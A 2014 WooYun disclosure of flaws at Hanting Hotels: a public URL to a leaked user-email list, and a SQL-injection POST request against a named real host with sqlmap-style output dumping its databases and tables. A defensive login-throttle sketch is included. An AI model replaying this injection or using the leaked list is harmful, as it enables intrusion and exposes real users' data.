
Hanting Hotels: an information leak and a POST injection

2014-04-28 22:25

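#1. Information leak: a large number of user email usernames are exposed here in a 6 MB TXT file. Collecting these usernames makes it possible to brute-force the back-end login, because the back end has no CAPTCHA and no limit on failed login attempts.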

http://jcxt.htinns.com/mail.txt
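The missing control named in #1, sketched as an added example (not code from the original report or from the affected site): a sliding-window limit on failed logins, counted per account and per source address. The class name, limits, window and the sample events are assumptions constructed for illustration; the replay shows why a per-account lockout alone does not stop one source trying a long list of harvested usernames.

```python
from collections import defaultdict, deque


class LoginThrottle:
    """Sliding-window limit on failed logins, keyed by account and by source."""

    def __init__(self, per_account=5, per_source=20, window=900):
        self.limits = {"account": per_account, "source": per_source}
        self.window = window                  # seconds
        self.failures = defaultdict(deque)    # (kind, key) -> failure timestamps

    def _recent(self, kind, key, now):
        q = self.failures[(kind, key)]
        while q and now - q[0] >= self.window:    # drop failures outside the window
            q.popleft()
        return len(q)

    def allowed(self, username, source, now):
        """Call before checking the password; False means reject or demand a CAPTCHA."""
        return (self._recent("account", username.lower(), now) < self.limits["account"]
                and self._recent("source", source, now) < self.limits["source"])

    def record_failure(self, username, source, now):
        self.failures[("account", username.lower())].append(now)
        self.failures[("source", source)].append(now)

    def record_success(self, username):
        self.failures.pop(("account", username.lower()), None)


def replay(events, throttle):
    """Replay (time, source, username, password_ok) tuples; return the blocked ones."""
    blocked = []
    for now, source, username, ok in events:
        if not throttle.allowed(username, source, now):
            blocked.append((now, source, username))
        elif ok:
            throttle.record_success(username)
        else:
            throttle.record_failure(username, source, now)
    return blocked


# Constructed events: one source tries 30 different usernames, one attempt per
# second; afterwards a different source logs in normally.
SPRAY = [(t, "198.51.100.7", f"user{t:02d}@example.com", False) for t in range(30)]
NORMAL = [(40, "203.0.113.9", "user03@example.com", True)]

if __name__ == "__main__":
    for entry in replay(SPRAY + NORMAL, LoginThrottle()):
        print("blocked", entry)
```

With the default limits the source is cut off after its 20th failure, while the later legitimate login from another address still goes through.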






A few are listed below:


Proof of vulnerability:

#2. A POST injection:



POST /exam2/login.asp?win= HTTP/1.1

Host: training.htinns.com

Proxy-Connection: keep-alive

Content-Length: 36

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://training.htinns.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://training.htinns.com/exam2/

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: Hm_lvt_e5770a47472445b3f839a58a32b8abe5=1394799212; Hm_lpvt_e5770a47472445b3f839a58a32b8abe5=1394799385; ASPSESSIONIDCSAQQQQQ=APGAMJPALKBMAOBPDBGIMADM; id=admin%27; %2Fbbs%2FGROUP=1



username=admin&password=admin&czbz=1





available databases [48]:

[*] Application_Registry_Service_DB_5d9281593cab42dc8320efcf7cbfd7a0

[*] Bdc_Service_DB_17fc7e4144144d30bf092d46962cf618

[*] dbcenter

[*] dnt31

[*] eCell6

[*] Exam1

[*] HT_eProcurement

[*] HTFranchisee

[*] HtinnsAdviser

[*] HTIntranetUAT

[*] HTScore

[*] InnInspection

[*] InspectionAudit

[*] Managed Metadata Service_eb3ad9498f3c4d538c1c638c92230972

[*] master

[*] model

[*] msdb

[*] OA

[*] PerformancePoint Service Application_1e41da1b1ab64e55b59c496da2baa509

[*] PnCheck

[*] PurchaseSurvey

[*] RCTIDB

[*] ReportServer

[*] ReportServerTempDB

[*] ROOMCHK

[*] Search_Service_Application_CrawlStoreDB_a4e0258f3e8d475dbc9ae62b373ce475

[*] Search_Service_Application_DB_e90bd9a6f93d43c294e41402b5d631e9

[*] Search_Service_Application_PropertyStoreDB_bda79800fee24b8691db0032d6ceccb

[*] Secure_Store_Service_DB_b62005406e8a4f12a854cb5a434821f4

[*] SharePoint_AdminContent_5947d722-6796-4bc7-ae44-1c894454c1f5

[*] SharePoint_Config

[*] slam

[*] StateService_23c5611220344b52bea83c8d6fd7ddc8

[*] tempdb

[*] test

[*] User Profile Service Application_ProfileDB_cb8f9f4b3ec14f0ea7f125fe176a4e0

[*] User Profile Service Application_SocialDB_6bd18e2e80804b86bc5687f722d780ab

[*] User Profile Service Application_SyncDB_c8c90e3cd266442f83f260c4b75ad735

[*] USERPLUS

[*] VHArchives_HanTing

[*] WebAnalyticsService????_ReportingDB_7dc7dc51-0f26-49e6-8b74-9187ccdf0186

[*] WebAnalyticsService????_StagingDB_458c6a10-f5c4-4756-a2d6-010eb6805b43

[*] WordAutomationServices_04a084d97a3d4f83af4b3667b5385333

[*] WSS_Content

[*] WSS_Content_90

[*] WSS_Content_b3117e51d8c8405888a80388555ec208

[*] WSS_Logging

[*] YunYing





database management system users [2]:

[*] PowerExamUser

[*] sa





Database: Exam1

[41 tables]

+--------------------+

| dbo.BbsClass |

| dbo.BbsMain |

| dbo.Cjdxm |

| dbo.Denglu |

| dbo.Fenzu |

| dbo.Fenzu_Renyuan |

| dbo.Ftp_Cs |

| dbo.Ftp_Kc |

| dbo.Glyftpqx |

| dbo.ImgKu |

| dbo.Kaoshi_Detail |

| dbo.Kaoshi_Master |

| dbo.Kaoshi_daan |

| dbo.Kc_Main |

| dbo.Kc_Ren |

| dbo.Kc_lb |

| dbo.Ksj_Cl |

| dbo.Ksj_Cl_Temp |

| dbo.Ksj_Gd_Detail |

| dbo.Ksj_Main |

| dbo.Ksj_Ren |

| dbo.Mrfz |

| dbo.OperLog |

| dbo.Reninfoset |

| dbo.Renyuan |

| dbo.RenyuanInfo |

| dbo.ScoreView |

| dbo.Sjglqx |

| dbo.TZ |

| dbo.TiKu_Detail |

| dbo.Tiku_Main |

| dbo.Tkj |

| dbo.Tkjgl |

| dbo.Tmlb |

| dbo.Txfs |

| dbo.Txsx |

| dbo.Txxz |

| dbo.UserExamRecord |

| dbo.Userinfo |

| dbo.Zhsz |

| dbo.dtproperties |

+--------------------+

Remediation:

Source: www.wooyun.org/bugs/wooyun-2014-053667
